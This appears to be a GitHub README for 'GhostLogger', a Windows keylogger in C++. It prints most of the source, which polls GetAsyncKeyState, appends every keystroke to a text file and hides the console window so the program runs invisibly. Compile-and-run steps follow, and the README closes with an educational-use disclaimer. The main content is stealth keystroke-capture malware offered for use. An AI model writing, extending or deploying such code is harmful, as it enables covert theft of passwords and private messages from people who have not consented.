Welcome to GhostLogger, a stealthy and efficient keylogging application for Windows! Designed for educational purposes and to demonstrate low-level Windows programming techniques, GhostLogger captures and records keystrokes in a hidden manner.
- Stealth Mode: Runs invisibly in the background.
- Comprehensive Key Logging: Captures a wide range of keys, including alphabetic characters, numeric keys, function keys, control keys, and special characters.
- Log File: Records all keystrokes in
Record.txt.
GhostLogger
├───.vscode
│ ├───c_cpp_properties.json
│ ├───settings.json
│ └───tasks.json
└───src
├───main.cpp
└───Record.txt
The main functionality is encapsulated in main.cpp, which includes the following key components:
- KeyLogger: A function that captures keystrokes using
GetAsyncKeyStateand writes them toRecord.txt. - hide_exe: A function that hides the console window to ensure the program runs
invisibly.
Here's a brief look at the core code in main.cpp:
#include <iostream>
#include <windows.h>
#include <winuser.h>
#include <fstream>
// Function prototypes
void KeyLogger(void);
void hide_exe(void);
// main function
int main(void)
{
hide_exe();
KeyLogger();
}
// function to capture the keystrokes
void KeyLogger(void)
{
char character;
while (true)
{
for (character = 8; character <= 222; character++)
{
if (GetAsyncKeyState(character) == -32767)
{
std::ofstream write("Record.txt", std::ios::app);
if (character > 64 && character < 91 && !GetAsyncKeyState(0x10))
{
character += 32;
write << character;
}
else if (character > 64 && character < 91)
{
write << character;
}
switch (character)
{
case 39: // '
write << (GetAsyncKeyState(0x10) ? "\"" : "'");
break;
case 44: // ,
write << (GetAsyncKeyState(0x10) ? "<" : ",");
break;
// ... handle other cases ...
case VK_RETURN: // ENTER key
write << " <Enter> " << std::endl;
break;
case 32: // Space key
write << " ";
break;
// ... handle other cases ...
}
}
}
}
}
// function to hide the exe file.
void hide_exe(void)
{
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
}
To run GhostLogger on your machine, follow these steps for different operating systems:
-
Clone the Repository:
git clone https://github.com/B3TA-BLOCKER/GhostLogger.git
-
Open and Edit the Code:
- Use any text editor of your choice (e.g., Notepad++, Sublime Text, Atom, or even Notepad).
-
Compile and Run:
- Ensure you have a C++ compiler installed. You can use any of the following methods:
-
Install MinGW: Download and install MinGW from MinGW website.
-
Compile the Code:
g++ src/main.cpp -o main
-
Run the Program:
./main
-
Install Visual Studio: Download and install Visual Studio from Visual Studio website.
-
Open the Project:
- Create a new project or open an existing one.
- Add
main.cppto the project.
-
Compile and Run:
- Use the build and run options within Visual Studio.
This project relies on Windows-specific APIs and functions, making it incompatible with macOS and Linux out of the box.
As GhostLogger uses Windows-specific functions like GetAsyncKeyState, AllocConsole, and FindWindowA, it won't compile or run on macOS and Linux without significant modifications. The instructions above are for general C++ projects.
- Once the program is running, it will operate in the background, logging all keystrokes to
Record.txt. - To stop the program, you will need to end the process through Task Manager or by terminating it via your development environment.
This project is intended for educational purposes only. Unauthorized use of keylogging software is illegal and unethical. Always ensure you have explicit permission before using this software on any device.
I'm always looking to expand my professional network and explore new opportunities. Let's connect!
This project is licensed under the Creative Commons Zero v1.0 Universal License. See the LICENSE file for details.
Made by Hassaan Ali Bukhari